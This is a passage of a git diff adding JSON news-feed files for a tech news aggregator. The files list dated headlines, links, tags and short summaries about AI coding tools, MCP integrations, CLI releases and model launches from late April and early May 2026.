1, + "date": "2026-04-29T14:44:20.783Z", + "summary": "Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session.", + "category": "ai_tools" + }, + { + "title": "AAIF Announces AGNTCon and MCPCon EU and NA for 2026", + "url": "https://x.com/AgenticAIFdn/status/2039696612633571565", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "product_launch" + ], + "matching_tags": [ + "mcp", + "product_launch" + ], + "importance": 1, + "date": "2026-04-29T14:41:24.682Z", + "summary": "The Agentic AI Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders.", + "category": "ai_tools" + }, + { + "title": "Poolside AI Just Released Its First Public Models: Open Source and API", + "url": "https://x.com/marah_i_abdin/status/2049161468017287490", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-29T01:48:00.432Z", + "summary": "Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model.", + "category": "ai_tools" + }, + { + "title": "Qwen Code v0.15.5 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-29T09:54:18.000Z", + "summary": "## What's Changed\n* mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279\n* fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667\n* feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687\n* feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577\n* feat(cli): wire backgrou", + "category": "ai_tools" + }, + { + "title": "The final nail in the coffin for entry level creative freelancers just dropped", + "url": "https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.94, + "date": "2026-04-29T09:55:19.000Z", + "summary": "Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type \"create a low poly beach scene with palm trees and sunset lighting\" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron\n\nThis is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects", + "category": "ai_tools" + }, + { + "title": "Launched My First App Using Claude", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-29T16:07:47.000Z", + "summary": "Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude.\n\nIt’s a vehicle management app. Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API).\n\nIt’s all front end, and everything is stored locally on the users device. The API calls do require a da", + "category": "ai_tools" + }, + { + "title": "Claude Design is amazing but I keep hitting rate limits. Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.78, + "date": "2026-04-29T15:15:33.000Z", + "summary": "Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations.\n\nFound an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit.\n\n\n\nWanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e", + "category": "ai_tools" + }, + { + "title": "Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-29T18:23:09.000Z", + "summary": "So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all.\n\n**What Claude did autonomously:**\n\n* Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm)\n* Mapped every port and ", + "category": "ai_tools" + }, + { + "title": "Pattern I'm using to keep Claude Code productive on overnight unattended runs", + "url": "https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-04-29T06:51:16.000Z", + "summary": "Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code.\n\nBuilt a small framework around three pieces that, between them, solved it for me. Together this framework as enabled me to consistently run v", + "category": "ai_tools" + }, + { + "title": "Your Claude Code project dashboard is now on the Mac App Store", + "url": "https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-04-29T03:13:42.000Z", + "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free.\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo.\n\nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server expose it to ", + "category": "ai_tools" + }, + { + "title": "LosslessCut v3.68.0 released", + "url": "https://github.com/mifi/lossless-cut/releases/tag/v3.68.0", + "source": "GitHub Releases · LosslessCut", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.7, + "date": "2026-01-29T16:54:17.000Z", + "summary": "⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311)\r\n\r\nNote: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut", + "category": "ai_tools" + }, + { + "title": "I built a Kanban board for Claude Code so I can run agent sessions straight from cards", + "url": "https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.54, + "date": "2026-04-28T21:04:05.000Z", + "summary": "I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done.\n\nSo I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). \n\nEach card is a task. Click run → it spins up a Claude session scoped to that task. When Claude finishes, the card moves itself to Done.\n\nIt turned Claude from \"a terminal I talk to\" into ", + "category": "ai_tools" + }, + { + "title": "Are we underweighting execution benchmarks when we talk about open-source frontier models?", + "url": "https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-29T20:41:38.000Z", + "summary": "A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier.\n\n\n\nLing-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling.\n\n\n\nIf more frontier open models", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-30.json b/data/news-feed-2026-04-30.json new file mode 100644 index 0000000..b7d0e4d --- /dev/null +++ b/data/news-feed-2026-04-30.json @@ -0,0 +1,255 @@ +{ + "generated": "2026-06-05T00:44:36.990Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-30", + "article_count": 15, + "archived_story_count": 692, + "articles": [ + { + "title": "[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read", + "url": "https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-30T13:11:07.000Z", + "summary": "Working on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc).\n\nWe built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv", + "category": "ai_tools" + }, + { + "title": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", + "url": "https://x.com/AI_BioPhD/status/2049769860897321027", + "source": "X / @ai_biophd", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-30T08:36:32.000Z", + "summary": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", + "category": "ai_tools" + }, + { + "title": "Cursor SDK — The Democratization of Agent Development", + "url": "https://x.com/Marktechpost/status/2049711306643759265", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-30T05:23:49.823Z", + "summary": "Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment.", + "category": "ai_tools" + }, + { + "title": "Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", + "url": "https://x.com/Codex_Changelog/status/2049905403262079480", + "source": "X / @codex_changelog", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.97, + "date": "2026-04-30T17:35:08.000Z", + "summary": "Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", + "category": "ai_tools" + }, + { + "title": "Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell", + "url": "https://pu.dev/", + "source": "Hacker News", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 0.88, + "date": "2026-04-30T20:55:12.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.8600000000000001, + "date": "2026-04-30T15:59:02.000Z", + "summary": "Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it.\n\nLightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). About 47K lines of Go, 114 MCP too", + "category": "ai_tools" + }, + { + "title": "pnpm v11.0.3 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.3", + "source": "GitHub Releases · pnpm", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-30T21:17:05.000Z", + "summary": "## Patch Changes\r\n\r\n* Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412).\r\n* Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na", + "category": "ai_tools" + }, + { + "title": "Vercel CLI @vercel/python-workers@0.0.20 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.76, + "date": "2026-04-30T03:51:45.000Z", + "summary": "### Patch Changes\n\n- 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers\n", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.40.1 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-30T18:16:48.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/26268\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1", + "category": "ai_tools" + }, + { + "title": "X announces a rebuilt ad platform powered by AI", + "url": "https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-30T18:04:35.970Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Stripe introduces Link, a digital wallet that autonomous AI agents can use, too", + "url": "https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-30T18:04:35.962Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "The MCP Era Feels Like Déjà Vu 1 day ago • 3", + "url": "https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu", + "source": "Hugging Face Blog", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-30T18:04:33.505Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tut…", + "url": "https://x.com/ClaudeDigest/status/2049902211292127462", + "source": "X / @claudedigest", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-30T17:22:27.000Z", + "summary": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tutorials/mdx/ mastering-claude-code …", + "category": "ai_tools" + }, + { + "title": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", + "url": "https://x.com/polsia/status/2049901864381288455", + "source": "X / @polsia", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-30T17:21:04.000Z", + "summary": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", + "category": "ai_tools" + }, + { + "title": "MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights", + "url": "https://x.com/itsPaulAi/status/2049862276832715177", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-30T15:20:23.436Z", + "summary": "Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. The gap is closing fast.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-01.json b/data/news-feed-2026-05-01.json new file mode 100644 index 0000000..989f34e --- /dev/null +++ b/data/news-feed-2026-05-01.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:37.161Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-01", + "article_count": 15, + "archived_story_count": 600, + "articles": [ + { + "title": "Built + open sourced anti-slopsquatting CLI", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-01T06:56:08.000Z", + "summary": "TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators.\n\nRepo: https://github.com/zhendahu/dep-doctor\n\nThere's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s", + "category": "ai_tools" + }, + { + "title": "Vercel CLI @vercel/python-workers@0.0.21 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-05-01T22:29:33.000Z", + "summary": "### Patch Changes\n\n- 6935baa: Refactor Python queue sdk into `_queue/`\n- 574c9f1: [vercel-workers] Replaces retention_seconds and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6)\n", + "category": "ai_tools" + }, + { + "title": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…", + "url": "https://x.com/firstadopter/status/2050264818972516799", + "source": "X / @firstadopter", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T17:23:19.000Z", + "summary": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..”", + "category": "ai_tools" + }, + { + "title": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…", + "url": "https://x.com/OpenAI/status/2050250926888468929", + "source": "X / @openai", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T16:28:07.000Z", + "summary": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing.", + "category": "ai_tools" + }, + { + "title": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.", + "url": "https://x.com/yunara97/status/2050108352550592636", + "source": "X / @yunara97", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-01T07:01:35.000Z", + "summary": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.", + "category": "ai_tools" + }, + { + "title": "Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast", + "url": "https://x.com/NousResearch/status/2049878944007041210", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-01T02:15:34.945Z", + "summary": "Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. The open-source agent ecosystem is maturing quickly.", + "category": "ai_tools" + }, + { + "title": "Whohas – Command-line utility for cross-distro, cross-repository package search", + "url": "https://github.com/whohas/whohas", + "source": "Hacker News", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-05-01T15:01:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-01T15:26:45.000Z", + "summary": "https://vexjoy.com/posts/cloud-skills-are-still-just-skills/\n\nThe skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect.\n\nIf Anthropic ships more features this way, the ecosystem splits into ope", + "category": "ai_tools" + }, + { + "title": "Found Zero day Claude Desktop + Chromium bug need to know where to submit report.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-01T13:52:27.000Z", + "summary": "Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. \n\nPlease let me know where I can submit this report.", + "category": "ai_tools" + }, + { + "title": "Example of using the GodotIQ MCP with Coding Agent to create video games", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 0.7, + "date": "2026-05-01T11:04:05.000Z", + "summary": "I’ve developed an MCP server for Godot. Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor.\n\nTo test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca", + "category": "ai_tools" + }, + { + "title": "Mobile App with Clade", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-05-01T09:19:51.000Z", + "summary": "Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses \"Add to Homescreen\" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. And h", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.7 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.7", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.7, + "date": "2026-05-01T02:50:31.000Z", + "summary": "\n\n## What's Changed\n### eslint\n* chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604\n### Examples\n* feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in https://github.com/vercel/turborepo/pull/12595\n* chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600\n* examples", + "category": "ai_tools" + }, + { + "title": "Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-05-01T13:30:04.000Z", + "summary": "I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off.\n\n\n\nSo I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s", + "category": "ai_tools" + }, + { + "title": "You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…", + "url": "https://x.com/_stephenbishop_/status/2050263244020015404", + "source": "X / @_stephenbishop_", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-01T17:17:04.000Z", + "summary": "You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta", + "category": "ai_tools" + }, + { + "title": "VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale", + "url": "https://x.com/veedstudio", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-01T14:45:55.101Z", + "summary": "VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-02.json b/data/news-feed-2026-05-02.json new file mode 100644 index 0000000..acfd8ba --- /dev/null +++ b/data/news-feed-2026-05-02.json @@ -0,0 +1,273 @@ +{ + "generated": "2026-06-05T00:44:37.317Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-02", + "article_count": 15, + "archived_story_count": 459, + "articles": [ + { + "title": "@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts", + "url": "https://x.com/WesRoth/status/2050606311440531809", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "product_launch", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T16:23:29.285Z", + "summary": "Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language.", + "category": "ai_tools" + }, + { + "title": "I built a Claude Code skill that gives Claude real local time + session tracking (open source, one-line install)", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-02T18:27:13.000Z", + "summary": "Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says \"the current time\" it's hallucinating. Got tired of correcting it, so I built time-anchor. **What it does:** \\- Auto-detects your timezone on install, no API key, no network call \\- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \\- Logs every session start/end so Claude can answer \"how long have we been talking\" or \"what did I say 20 minutes ago\" \\- Persists in 